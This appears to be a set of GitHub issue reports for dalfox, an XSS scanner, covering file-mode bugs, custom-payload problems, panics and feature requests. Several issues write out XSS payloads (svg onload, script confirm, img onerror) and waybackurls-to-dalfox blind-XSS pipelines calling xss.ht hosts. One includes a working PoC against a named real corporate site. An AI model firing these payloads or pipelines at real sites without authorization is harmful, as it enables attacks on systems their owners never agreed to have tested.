the tools seem to be loading the filename instead of its real content using the file mode. I'm using dalfox latest version. here are the commands I used:

Command

dalfox -b username.xss.ht file ~/tools/ParamSpider/output/target.com.txt

Results:

    _..._
  .' .::::.   __   _   _    ___ _ __ __ 
 :  :::::::: |  \ / \ | |  | __/ \\ V / 
 :  :::::::: | o ) o || |_ | _( o )) (  
 '. '::::::' |__/|_n_||___||_| \_//_n_\                           
   '-.::''

Parameter Analysis and XSS Scanning tool based on golang
Finder Of XSS and Dal is the Korean pronunciation of moon. @hahwul
[*] Using file mode(targets list)
[*] Loaded 0 target urls

Second Command:

dalfox -b username.xss.ht file test

Results:

    _..._
  .' .::::.   __   _   _    ___ _ __ __ 
 :  :::::::: |  \ / \ | |  | __/ \\ V / 
 :  :::::::: | o ) o || |_ | _( o )) (  
 '. '::::::' |__/|_n_||___||_| \_//_n_\                           
   '-.::''

Parameter Analysis and XSS Scanning tool based on golang
Finder Of XSS and Dal is the Korean pronunciation of moon. @hahwul
[*] Using file mode(targets list)
[*] Loaded 1 target urls
[*] Target URL: test
[E] not running Get lol: unsupported protocol scheme ""

Summary

Hello First of all thanks for the awesome tool , I wanted to make some BXSS attack oneliner and I used your tool to perform such action

Description

XSS get triggered but my blind XSS is ignored .. After visiting the links the payload used is not my BXSS payload

Command

echo "testphp.vulnweb.com" |  waybackurls | anti-burl | grep -Eo "https?://[^\"\\'> ]+" | grep "=" | grep -v ".jpg\|.png\|.css\|.js" | dalfox pipe -b https://sicksec.xss.ht

Requirement go get -v github.com/tomnomnom/waybackruls go get -v github.com/tomnomnom/hacks/anti-burl

System Config

Ubuntu 18.04 Go1.14 Dalfox 1.1.2

Question

When I tried dalfox on real site, I only ever got up to [I] Reflected PATH messages but never got a [PoC] result or an output file, so I'm testing it on OWASP Juice Shop. The test is as follows:

$ cat tmp
http://localhost:3000/#/search?q=FUZZ

$ dalfox file tmp -o dalfox.txt

    _..._
  .' .::::.   __   _   _    ___ _ __ __
 :  :::::::: |  \ / \ | |  | __/ \\ V /
 :  :::::::: | o ) o || |_ | _( o )) (
 '. '::::::' |__/|_n_||___||_| \_//_n_\
   '-.::''

Parameter Analysis and XSS Scanning tool based on golang
Finder Of XSS and Dal is the Korean pronunciation of moon. @hahwul

 🎯  Target                 tmp
 🏁  Method                 GET
 🖥   Worker                 100
 🔦  BAV                    true
 ⛏   Mining                 true (Gf-Patterns)
 🔬  Mining-DOM             true (mining from DOM)
 ⏱   Timeout                10
 📤  FollowRedirect         false
 🕰   Started at             2021-06-09 21:13:18.114339628 +0700 +07 m=+0.007974295

 >>>>>>>>>>>>>>>>>>>>>>>>>
[*] 🦊 Start scan [SID:0][0/1][0.00%%] / URL: http://localhost:3000/#/search?q=FUZZ
[I] Found 0 testing point in DOM Mining
[I] Content-Type is text/html; charset=UTF-8ter and static analysis 🔍
[I] X-Frame-Options is SAMEORIGIN
[I] Access-Control-Allow-Origin is *
[*] Finish Scan

$ ls
tmp

I've confirmed that the q parameter in the URL is vulnerable to XSS but dalfox is getting nothing. Am I doing something wrong?

Environment

• Dalfox Version: v2.3.7
• Installed from: go-get
• OWASP Juice Shop running with docker on localhost:3000

Hi, good work I have a question, I just cant make custom XSS payloads to work.

by using dalfox url https://xss-game.appspot.com/level1/frame?query= -b https://keev.es/XSS.txt I will get

[V] Triggered XSS Payload (found DOM Object): query=<scRipT class=dalfox>confirm(45)</script>
    13 line:  s were found for <b><scRipT class=dalfox>confirm(45)</script></b>. <a href='?'>T
[POC][V][GET] https://xss-game.appspot.com/level1/frame?query=%3CscRipT+class%3Ddalfox%3Econfirm%2845%29%3C%2Fscript%3E

it somehow always use Dalfox XSS payloads

Any idea what I am doing wrong? Thank you

Hello again,

I know there has already been one open inquiry regarding false positives but I am quite more curious about the current situation. Have you personally stumbled upon any? Recently, for instance, I might have possibly got one positive for an XSS but am not sure about it because in browser (only tested in the latest Chromium) it doesn't trigger the alert on load. What do you think?

[V] Triggered XSS Payload (found DOM Object): callback='><sVg/onload=alert(45) class=dalfox> 1 line: FUZZ\'><sVg/onload=alert(45) class=dalfox>({"status":"ok","count":12,"count_tota

My question therefore is, how can we distinguish that? Is it dependent on anything?

Thank you very much in advance for your help and comment on this topic.

Hello,

Getting same error as with your other tool (s3reverse) when piping through other commands:

echo "redacted.com" | waybackurls | head -5 | egrep -o "http?.*" | grep "="| egrep -v ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt|js)" | qsreplace -a | dalfox pipe -blind https://xxx.xss.ht/

_..._

.' .::::. __ _ _ ___ _ __ __ : :::::::: | \ / \ | | | / \ V / : :::::::: | o ) o || | | ( o )) (
'. '::::::' |/|n||||| _//n\
'-.::''

Parameter Analysis and XSS Scanning tool based on golang Finder Of XSS and Dal is the Korean pronunciation of moon. @hahwul [*] Using pipeline mode [*] Loaded 1 target urls [*] Target URL: http://www.redacted.com?cmp=701j000000096imaai [*] Vaild target [ code:200 / size:93822 ] [*] Start static analysis.. 🔍 [*] Start parameter analysis.. 🔍 ◓ Waiting routines.. panic: runtime error: invalid memory address or nil pointer dereference [signal SIGSEGV: segmentation violation code=0x1 addr=0x38 pc=0x78b7af]

goroutine 42 [running]: github.com/hahwul/dalfox/pkg/scanning.StaticAnalysis(0xc0000b40c0, 0x2c, 0xc0000a33e0, 0x1c) /home/xxx/go/src/github.com/hahwul/dalfox/pkg/scanning/scan.go:463 +0x8f github.com/hahwul/dalfox/pkg/scanning.Scan.func1(0xc00018c0b4, 0xc0000a33e0, 0xc0000b40c0, 0x2c, 0xc0000bc080) /home/xxx/go/src/github.com/hahwul/dalfox/pkg/scanning/scan.go:75 +0xb5 created by github.com/hahwul/dalfox/pkg/scanning.Scan /home/xxx/go/src/github.com/hahwul/dalfox/pkg/scanning/scan.go:72 +0x342

go version go1.13.5 linux/amd64

Describe the bug

The delay option is only used when testing for XSS and thus if BAV is not turned off, it would generate ~60 requests per parameter without delay. Now in some cases this might be enough to trigger a WAF and thus block requests from ip even after using the delay option.

Environment

• Dalfox Version: latest version
• Installed from: go

Describe the bug

I was trying to add my custom payload to dalfox, but It doesn't look to add any. Looking at the other output on GitHub it looks like it would tell me something like

"[*] Added your 6 custom xss payload".

It doesn't say that, and also checking in burpsuite for request, doesn't seem to add the custom payload to request. I've done many tests, but I'll use this vulnerable endpoint to show you:

dalfox url "https://jobs.corporate.ford.com/List/Custom/Ford-Department"

[POC][V][GET] https://jobs.corporate.ford.com/List/Custom/Ford-Department%22%3E%3Ciframe%20srcdoc=%22%3Cinput%20onauxclick=prompt%281%29%3E%22%20class=dalfox%3E%3C/iframe%3E?=

So I've created a custom file payload like that (just to try):

cat /tmp/dalfox_custom.txt                                                                                                                                                                          
"><img src=x onerror=alert('test')>

Then I run

dalfox url "https://jobs.corporate.ford.com/List/Custom/Ford-Department" --custom-payload /tmp/dalfox_custom.txt --only-custom-payload --proxy http://127.0.0.1:8080

Not only output doesn't show anything about adding payload, but I can't see any request regarding that on burpsuite

Environment

• Dalfox Version: 2.4.9
• Installed from: go-get

Describe the bug

panic: runtime error: index out of range [2] with length 2

goroutine 1 [running]:
github.com/hahwul/dalfox/v2/pkg/scanning.Scan(0xc00002c100, 0x34, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, ...)
	/home/edoardottt/go/pkg/mod/github.com/hahwul/dalfox/[email protected]/pkg/scanning/scan.go:197 +0x574e
github.com/hahwul/dalfox/v2/cmd.glob..func2(0x19adbe0, 0xc000126620, 0x0, 0x2)
	/home/edoardottt/go/pkg/mod/github.com/hahwul/dalfox/[email protected]/cmd/pipe.go:99 +0xb38
github.com/spf13/cobra.(*Command).execute(0x19adbe0, 0xc000126600, 0x2, 0x2, 0x19adbe0, 0xc000126600)
	/home/edoardottt/go/pkg/mod/github.com/spf13/[email protected]/command.go:856 +0x29d
github.com/spf13/cobra.(*Command).ExecuteC(0x19ade60, 0x443cfa, 0x106d940, 0xc000000180)
	/home/edoardottt/go/pkg/mod/github.com/spf13/[email protected]/command.go:960 +0x349
github.com/spf13/cobra.(*Command).Execute(...)
	/home/edoardottt/go/pkg/mod/github.com/spf13/[email protected]/command.go:897
github.com/hahwul/dalfox/v2/cmd.Execute()
	/home/edoardottt/go/pkg/mod/github.com/hahwul/dalfox/[email protected]/cmd/root.go:38 +0x31
main.main()
	/home/edoardottt/go/pkg/mod/github.com/hahwul/dalfox/[email protected]/dalfox.go:10 +0x20

Environment

• Dalfox Version: v2.3.6
• Installed from: GO111MODULE=on go get -v github.com/hahwul/dalfox/v2

Hi mate! I want to hear your opinion about some things.

1. I believe the best option could be to move out the xss scanner to his own bav to have a better understanding of what you are trying to find. Then we can split again xss on differents bav modules for each type. (blind, etc). Whit this, we will also need to move detection and extra checks to his own files. I honestly feel that the code on scan.go is a bit complicated to follow.

2. Would be great to have the possibility (via configuration or using a command-line flag ) to disable some feature like parameter mining, parameter analysis, or Static analysis. Sometimes you just want to test on the current parameter list and each default option adds a lot of extra HTTP queries and that could finish on your ip blocked/banned.

let me know. :)

Hi. I am trying to start dalfox with a file containing all the URLs but unsuccessfully. I have tried almost anything, I always get this output:

[*] Using file mode(targets list) [*] Loaded 0 target urls

or

[*] Using file mode(targets list) [*] Loaded 1 target urls [*] Target URL: /Downloads/domains.txt [E] not running Get /Downloads/domains.txt: unsupported protocol scheme ""

I am trying dalfox file ./domains.txt or just domains.txt, full path, nothing works. You could probably add that to the readme. What should I do? It's a simple file like:

domains.txt https://dfds.dfd https://dghkgsdkjg.dgdsg

etc

Bumps github.com/labstack/echo/v4 from 4.9.1 to 4.10.0.

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.

Bumps github.com/briandowns/spinner from 1.19.0 to 1.20.0.

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.

this is the output i am now getting

⠸ [SA: ✓ PA: ✓ BAV: ✓ ] Waiting for analysis 🔍panic: runtime error: invalid memory address or nil pointer dereference [signal SIGSEGV: segmentation violation code=0x1 addr=0x60 pc=0x5f0df4]

goroutine 26 [running]: net/url.(*URL).Query(0xc000f79200) /usr/local/go/src/net/url/url.go:1130 +0x14 github.com/hahwul/dalfox/v2/pkg/scanning.ParameterAnalysis.func6(0xc00000e028, 0xc00056a000) /Users/ichei/Projects/release/dalfox/pkg/scanning/parameterAnlaysis.go:193 +0xaa github.com/PuerkitoBio/goquery.(*Selection).Each(0xc000f404b0, 0xc0000e5318) /Users/ichei/go/pkg/mod/github.com/!puerkito!bio/[email protected]/iteration.go:10 +0x46 github.com/hahwul/dalfox/v2/pkg/scanning.ParameterAnalysis({_, _}, {{0x1ba2cf8, 0x0, 0x0}, {0x0, 0x0}, {0x1ba2cf8, 0x0, 0x0}, ...}, ...) /Users/ichei/Projects/release/dalfox/pkg/scanning/parameterAnlaysis.go:189 +0xf05 github.com/hahwul/dalfox/v2/pkg/scanning.Scan.func3() /Users/ichei/Projects/release/dalfox/pkg/scanning/scan.go:151 +0xf8 created by github.com/hahwul/dalfox/v2/pkg/scanning.Scan /Users/ichei/Projects/release/dalfox/pkg/scanning/scan.go:149 +0x1195

Describe the bug

dalfox appears to be repeating scans of the same url and payload? e.g.

$ urls | dalfox pipe \
                --skip-mining-dict \
                --deep-domxss \
                --remote-payloads=payloadbox,portswigger
...
[#36] http://127.0.0.1:9093/angular/angular_body/1.2.0?q=code
[#37] http://127.0.0.1:9093/angular/angular_body/1.2.0?q=code
[#38] http://127.0.0.1:9093/angular/angular_body/1.2.0?q=code

Environment

• Dalfox Version: 2.8.2+
• Installed from: go install github.com/hahwul/dalfox/v2@863c1ce0a2ddf0f4e318ffb7318b7ecd079cab5b

Describe the bug

Given the page http://localhost containing

<form action="/xss.php">
  <input type="text" id="xss" name="xss"><br>
  <input type="submit" value="Submit">
  </ul>
</form>

the command

dalfox url http://localhost

fetches from

http://localhost/?xss=DalFox

when it should fetch from

http://localhost/app.php?xss=DalFox

It seems ParameterAnalysis() is ignoring the url part of the form action? See https://github.com/hahwul/dalfox/blob/c344c5842423f76e05e98db99965c504bc413e8b/pkg/scanning/parameterAnlaysis.go#L177

doc.Find("form").Each(func(i int, s *goquery.Selection) {
        action, _ := s.Attr("action")
        if strings.HasPrefix(action, "/") || strings.HasPrefix(action, "?") { // assuming this is a relative URL
                url, _ := url.Parse(action)
                query := url.Query()
                for aParam := range query { 
                        p, dp = setP(p, dp, aParam, options)
                        count = count + 1
                }                                  
        }       
})      

Environment

• Dalfox Version: c344c5842423f76e0
• Installed from: github clone

It would be really helpful if we could optionally have the entire HTTP request and HTTP Response in the JSON output as well. I realize this could become very large but it would be super helpful for providing useful context for the reader. Perhaps as two different options: --output-request and --output-response.